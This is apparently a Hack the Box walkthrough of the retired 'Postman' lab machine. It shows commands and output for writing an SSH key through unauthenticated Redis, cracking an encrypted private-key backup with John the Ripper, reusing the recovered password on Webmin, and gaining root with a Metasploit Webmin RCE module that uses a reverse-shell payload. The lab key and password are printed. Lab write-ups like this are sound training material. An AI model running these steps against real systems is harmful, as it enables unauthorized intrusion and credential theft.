hack the box walkthrough – Postman machine
New walkthrough for starting 2021 in a good track. Today we do the easy linux machine Postman on Hack the box.
Let’s jump in!
enumeration
As usual we start our enumeration with a nmap scan
[email protected]:~/Documents$ nmap -sC -sV -oA nmap 10.129.74.131 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-01 10:50 EST
Nmap scan report for 10.129.74.131
Host is up (0.044s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 194.11 seconds
On port 80 there is an apache running but after basic enumeration with dirbuster and nikto nothing interresting has been found
On port 6379 we have a redis running.
Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache, and message broker. Redis provides data structures such as strings, hashes, lists, sets, sorted sets with range queries, bitmaps, hyperloglogs, geospatial indexes, and streams. Redis has built-in replication, Lua scripting, LRU eviction, transactions, and different levels of on-disk persistence, and provides high availability via Redis Sentinel and automatic partitioning with Redis Cluster
With the redis cli command I could check if the redis instance is accepting anonymous connections
[email protected]:~/Documents$ redis-cli -h 10.129.74.131
10.129.2.1:6379> It seems yes! 😀
To get the config of this instance I just need to run the command CONFIG GET *
10.129.74.131:6379> CONFIG GET *
1) "dbfilename"
2) "dump.rdb"
3) "requirepass"
4) ""
5) "masterauth"
6) ""
7) "cluster-announce-ip"
8) ""
9) "unixsocket"
10) ""
11) "logfile"
12) "/var/log/redis/redis-server.log"
13) "pidfile"
14) "/var/run/redis/redis-server.pid"
15) "slave-announce-ip"
16) ""
17) "maxmemory"
18) "0"
19) "proto-max-bulk-len"
20) "536870912"
21) "client-query-buffer-limit"
22) "1073741824"
23) "maxmemory-samples"
24) "5"
25) "lfu-log-factor"
26) "10"
27) "lfu-decay-time"
28) "1"
29) "timeout"
30) "0"
31) "active-defrag-threshold-lower"
32) "10"
33) "active-defrag-threshold-upper"
34) "100"
35) "active-defrag-ignore-bytes"
36) "104857600"
37) "active-defrag-cycle-min"
38) "25"
39) "active-defrag-cycle-max"
40) "75"
41) "auto-aof-rewrite-percentage"
42) "100"
43) "auto-aof-rewrite-min-size"
44) "67108864"
45) "hash-max-ziplist-entries"
46) "512"
47) "hash-max-ziplist-value"
48) "64"
49) "list-max-ziplist-size"
50) "-2"
51) "list-compress-depth"
52) "0"
53) "set-max-intset-entries"
54) "512"
55) "zset-max-ziplist-entries"
56) "128"
57) "zset-max-ziplist-value"
58) "64"
59) "hll-sparse-max-bytes"
60) "3000"
61) "lua-time-limit"
62) "5000"
63) "slowlog-log-slower-than"
64) "10000"
65) "latency-monitor-threshold"
66) "0"
67) "slowlog-max-len"
68) "128"
69) "port"
70) "6379"
71) "cluster-announce-port"
72) "0"
73) "cluster-announce-bus-port"
74) "0"
75) "tcp-backlog"
76) "511"
77) "databases"
78) "16"
79) "repl-ping-slave-period"
80) "10"
81) "repl-timeout"
82) "60"
83) "repl-backlog-size"
84) "1048576"
85) "repl-backlog-ttl"
86) "3600"
87) "maxclients"
88) "10000"
89) "watchdog-period"
90) "0"
91) "slave-priority"
92) "100"
93) "slave-announce-port"
94) "0"
95) "min-slaves-to-write"
96) "0"
97) "min-slaves-max-lag"
98) "10"
99) "hz"
100) "10"
101) "cluster-node-timeout"
102) "15000"
103) "cluster-migration-barrier"
104) "1"
105) "cluster-slave-validity-factor"
106) "10"
107) "repl-diskless-sync-delay"
108) "5"
109) "tcp-keepalive"
110) "300"
111) "cluster-require-full-coverage"
112) "yes"
113) "cluster-slave-no-failover"
114) "no"
115) "no-appendfsync-on-rewrite"
116) "no"
117) "slave-serve-stale-data"
118) "yes"
119) "slave-read-only"
120) "yes"
121) "stop-writes-on-bgsave-error"
122) "yes"
123) "daemonize"
124) "yes"
125) "rdbcompression"
126) "yes"
127) "rdbchecksum"
128) "yes"
129) "activerehashing"
130) "yes"
131) "activedefrag"
132) "no"
133) "protected-mode"
134) "no"
135) "repl-disable-tcp-nodelay"
136) "no"
137) "repl-diskless-sync"
138) "no"
139) "aof-rewrite-incremental-fsync"
140) "yes"
141) "aof-load-truncated"
142) "yes"
143) "aof-use-rdb-preamble"
144) "no"
145) "lazyfree-lazy-eviction"
146) "no"
147) "lazyfree-lazy-expire"
148) "no"
149) "lazyfree-lazy-server-del"
150) "no"
151) "slave-lazy-flush"
152) "no"
153) "maxmemory-policy"
154) "noeviction"
155) "loglevel"
156) "notice"
157) "supervised"
158) "no"
159) "appendfsync"
160) "everysec"
161) "syslog-facility"
162) "local0"
163) "appendonly"
164) "no"
165) "dir"
166) "/var/lib/redis"
167) "save"
168) "900 1 300 10 60 10000"
169) "client-output-buffer-limit"
170) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
171) "unixsocketperm"
172) "0"
173) "slaveof"
174) ""
175) "notify-keyspace-events"
176) ""
177) "bind"
178) "0.0.0.0 ::1"
10.129.74.131:6379>The interresting information here is on lines 165 and 166 which show me the redis user path. I can write an authorized_keys file with one SSH public key and I will be able to login via ssh on the server.
For that I have used the Redis Server Exploit python script which you can find here. Then it is very easy : run the script with 2 arguments (the IP of the server and the username of the redis instance) and you have a ssh connection:
[email protected]:~/Documents$ redis-cli -h 10.129.74.131
10.129.74.131:6379> config set dir /var/lib/redis/.ssh/
OK
10.129.74.131:6379> config set dbfilename "authorized_keys"
OK
10.129.74.131:6379> save
OK
10.129.74.131:6379> exit
[email protected]:~/Documents$ python redis.py 10.129.74.131 redis
*******************************************************************
* [+] [Exploit] Exploiting misconfigured REDIS SERVER*
* [+] AVINASH KUMAR THAPA aka "-Acid"
*******************************************************************
SSH Keys Need to be Generated
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
/home/kali/.ssh/id_rsa already exists.
Overwrite (y/n)?
Keys Generated Successfully
OK
OK
OK
(error) ERR Changing directory: Permission denied
OK
OK
You'll get shell in sometime..Thanks for your patience
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
[email protected]:~$
Lateral movement
With Linpeas I could found a backup containing a SSH private key which belongs to Matt
[email protected]:~$ cat /opt/id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----
[email protected]:~$
We can crack it with John the ripper
[email protected]:~/Documents$ locate ssh2john.py
/usr/share/john/ssh2john.py
[email protected]:~/Documents$ python /usr/share/john/ssh2john.py id_rsamatt > id_rsa.hash[email protected]:~/Documents$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (id_rsamatt)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:13 DONE (2021-01-01 08:07) 0.07645g/s 1096Kp/s 1096Kc/s 1096KC/sa6_123..*7¡Vamos!
Session completedFor any reason I couldn’t use it for SSH connection:
[email protected]:~/Documents$ ssh -i id_rsamatt 10.129.74.131
load pubkey "id_rsamatt": invalid format
Enter passphrase for key 'id_rsamatt':
Connection closed by 10.129.74.131 port 22Privilege Escalation
I remember then that we had a webmin application running on port 10000. So I tried with the credential Matt / computer2008 and bingo, I am connected:
Looking at searchsploit I had a match:
msf6 exploit(linux/http/webmin_packageup_rce) > show options
Module options (exploit/linux/http/webmin_packageup_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 10000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path for Webmin application
USERNAME yes Webmin Username
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Webmin <= 1.910
msf6 exploit(linux/http/webmin_packageup_rce) > set password computer2008
password => computer2008
msf6 exploit(linux/http/webmin_packageup_rce) > set rhosts 10.129.74.131
rhosts => 10.129.74.131
msf6 exploit(linux/http/webmin_packageup_rce) > set ssl true
[!] Changing the SSL option's value may require changing RPORT!
ssl => true
msf6 exploit(linux/http/webmin_packageup_rce) > set username Matt
username => Matt
msf6 exploit(linux/http/webmin_packageup_rce) > set lhost tun0
lhost => 10.10.14.105
msf6 exploit(linux/http/webmin_packageup_rce) > run And we are root !
